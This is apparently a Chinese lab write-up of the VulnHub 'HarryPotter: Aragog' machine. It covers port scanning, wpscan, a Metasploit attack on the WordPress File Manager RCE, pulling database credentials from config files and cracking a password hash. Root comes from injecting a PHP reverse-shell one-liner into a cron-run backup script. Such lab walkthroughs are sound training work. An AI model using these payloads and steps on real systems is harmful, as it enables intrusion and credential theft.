环境搭建

靶场下载链接:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/
我这里使用的NAT网络kali和靶机都在10.0.2.0/24这个网段

1
2
3
kali:10.0.2.15

靶机:10.0.2.4

目标

找到两个flag-》horcruxes

打靶

首先是Nmap端口的扫描

顺手再做一个目录爆破

没啥可利用的,那就去访问一下80吧

发现了帅气的哈利波特,然后根据字典爆破的看看blog目录

发现了wordpress,那就无脑上wpscan咯

wpscan使用的话需要token api,只需要去官网注册一个帐号即可,每天有25次的免费api(爽姊姊)

wordpress的突破

1
2
3
4
5
6
7
#检测wordpress站点的漏洞
wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog
 
#检测wordpress站点所用插件的漏洞
wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog -e vp

#下图是庆尘大佬的图,我没扫出来<_<

file manager poc

https://github.com/Threekiii/Awesome-POC/blob/master/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/WordPress%20File%20Manager%EF%BC%9C6.9%20RCE%20CVE-2020-25213.md

msf

也可以用msf进行攻击

1
2
3
4
5
6
search wordpress file manager
use 1
set lhost 10.0.2.15
set targeturi http://10.0.2.4/blog/
set rhosts 10.0.2.4
run

通过py进行交互式的shell

1
python3 -c 'import pty; pty.spawn("/bin/bash");'

在/home/hagrid98下找到了第一个flag

然后通过查找配置文件(find 命令好好利用)

1
find / -type f -name *config*.php 2>/dev/null

找到了数据库的链接密码

1
root/mySecr3tPass
) 
1
2
name:hagrid98
pass:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. ->md5解密为password123

可能为ssh登录密码,进而尝试去利用
这个也可做为证据,说明存在该用户

提升为root

目前的话就是想着方法进行提权为root

1
find / -type f -name *back* 2>/dev/null

发现了该脚本,马赛克那一部分先不看,因为你机器上还没有这个,请直接忽略它

看到庆尘大佬说 
1
2
3
4
这里的命令是:
把upload那个目录下的所有文件cp到/tmp/tmp_wp_uploads中

可能存在计划任务,因此尝试修改内容,利用计划任务进行反弹shell

首先在/tmp下写一个php的脚本用来反弹shell

1
<?php $sock=fsockopen("10.0.2.15",7878);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

然后修改.backup.sh,添加

1
2
cd /tmp
/usr/bin/php /tmp/a.php

然后就在本地开启nc监听
等待计划任务的反弹shell,大概一分钟左右